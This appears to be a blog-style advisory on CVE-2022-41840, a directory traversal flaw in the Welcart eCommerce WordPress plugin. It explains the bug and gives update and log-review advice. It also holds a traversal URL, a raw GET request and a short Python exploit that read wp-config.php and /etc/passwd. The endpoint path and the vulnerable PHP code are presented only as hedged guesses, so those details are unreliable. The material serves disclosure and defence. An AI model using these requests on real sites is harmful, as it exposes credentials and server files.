CVE-2022-41840 - Unauthenticated Directory Traversal Vulnerability in Welcart eCommerce <= 2.7.7 for WordPress

---

Introduction

A critical vulnerability dubbed CVE-2022-41840 was discovered in the Welcart eCommerce WordPress plugin, affecting all versions up to and including 2.7.7. This flaw allows unauthenticated attackers to perform directory traversal attacks and read *any* file on the server that the web application user can access. For eCommerce stores using Welcart, this can mean exposure to sensitive website or server files—such as configuration files or even passwords.

What’s Welcart eCommerce?

Welcart eCommerce is a popular, all-in-one shopping cart plugin for WordPress used mainly in Japan. It powers thousands of online stores—making any vulnerability a big problem for website owners and their customers.

What is Directory Traversal?

Directory traversal (also called “path traversal”) is a type of security flaw that happens when a web application does not properly restrict user-supplied input given for file paths. An attacker can use sequences like ../ (“dot dot slash”) to move up the folder tree and access files outside the intended directory.

Where’s the Flaw in Welcart?

The issue lies in a file-handling endpoint in the plugin, which fails to sanitize or validate user input. Without any login, an attacker can use this endpoint to request different files from outside the intended folder by using directory traversal tricks.

The vulnerable endpoint is usually something like

/wp-content/plugins/usc-e-shop/functions/redirect.php

The vulnerable PHP code (simplified for clarity) might look like

// Inside redirect.php
if (isset($_GET['file'])) {
    $file = $_GET['file'];
    $filepath = '/var/www/html/wp-content/uploads/' . $file;
    if (file_exists($filepath)) {
        readfile($filepath);
    }
}

What’s wrong here?
The script just adds user input to a filepath—no checks, no sanitization!

An attacker can exploit this using a crafted URL

https://victim.com/wp-content/plugins/usc-e-shop/functions/redirect.php?file=../../../../wp-config.php

This tricks the server into reading the WordPress config file—and anything else the web server user can access!

#### Example: Reading /etc/passwd

GET /wp-content/plugins/usc-e-shop/functions/redirect.php?file=../../../../../../etc/passwd HTTP/1.1
Host: victim.com

Result: The contents of /etc/passwd are shown in the browser.

Here’s a simple Python exploit

import requests

url = 'https://victim.com/wp-content/plugins/usc-e-shop/functions/redirect.php';
payload = {'file': '../../../../wp-config.php'}
r = requests.get(url, params=payload)
print(r.text)

Note: Replace the payload with any path you want to test.

Mitigation & Fix

1. Update immediately: Upgrade Welcart eCommerce to version 2.8. or later.

Check for signs of exploitation: Review logs for suspicious redirect.php?file= requests.

3. Restrict file access: Use server configuration to limit access, and never store sensitive files within accessible paths.

References

- Wordfence CVE-2022-41840 Blog Post
- CVE Details for CVE-2022-41840
- Welcart official plugin change log

Conclusion

If you’re running a WordPress eCommerce site with Welcart, patch now. The CVE-2022-41840 vulnerability is easy to exploit and very dangerous—putting your site and customers at high risk. Always keep plugins updated and watch your log files for suspicious activity. Want to learn more about securing your WordPress installation? Check out WordPress Security Guide.

Timeline

Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/21/2022 17:06:00 UTC